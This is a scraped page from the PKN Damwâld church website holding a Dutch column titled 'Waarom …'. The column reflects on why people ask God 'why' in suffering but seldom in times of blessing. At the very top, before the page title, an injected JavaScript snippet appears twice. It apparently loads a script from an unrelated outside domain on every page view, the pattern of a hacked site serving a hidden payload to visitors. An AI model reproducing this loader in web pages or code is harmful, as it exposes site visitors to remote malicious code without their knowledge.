;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Waarom ... - PKN Damwâld

Waarom …

Gepubliceerd op: vrijdag 30 september 2022

Iedereen vraagt zich wel eens af waarom bepaalde dingen gebeuren. Of dat nu zaken betreffen in het grote wereld gebeuren, zoals oorlogen, hongersnoden, natuurrampen, ongelukken en dergelijke grote nare gebeurtenissen of dat het zaken betreffen in de eigen leefomgeving, die vraag komt regelmatig bij mensen op. Of een vraag als: Waarom heeft God de mens gemaakt ? Waarom zijn wij er ? Waarom, waarom, waarom ?

Opvallend is echter wel dat deze vraag bijna altijd wordt gesteld bij tegenslag. Waarom overkomt mij dit, waarom gebeurt in de wereld zoiets verschrikkelijks, waarom….. vult u zelf maar aan.
Eigenlijk is vaak de achterliggende vraag: Waarom laat God al die dingen toe, waarom gebeuren deze dingen? God is toch de Almachtige, kan Hij bepaalde dingen niet voorkomen ?
Waarom al die wreedheden in de oorlogen, waarom de haat tegen de Joden in de Tweede Wereldoorlog ? Een bezoeker van het kamp Auswitsch kwam bij zijn bezoek met de opmerking: ‘Zelfs God staat hier met lege handen’. Toch zingen wij vaak, en ook met de volste overtuiging: ‘Zie ik vraag U niet waarom, eenmaal zie ik al uw luister, als ik in Uw hemel kom’.

Waarom ? Het is waarschijnlijk een van de meest gesproken woorden. Het uitspreken van het woord of het zelfs maar er aan denken brengt een mens direct in een bepaald conflict met ………………..ja, met wie eigenlijk ? Meestal in conflict met God of een of andere andere ‘macht’ waarin men zijn geloof hecht. Waarom… deze tegenspoed hebben wij toch niet verdiend ?
Maar stellen wij ons deze vraag ook wanneer het ons goed gaat ? Waarom deze zegeningen, waarom deze gezondheid, waarom deze materiële voorspoed ? Waarom… deze zegeningen, voorspoed en dergelijke, hebben wij die wel verdiend ? Of zijn dit genade gaven ? Waarom zegent God ons met ………..

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns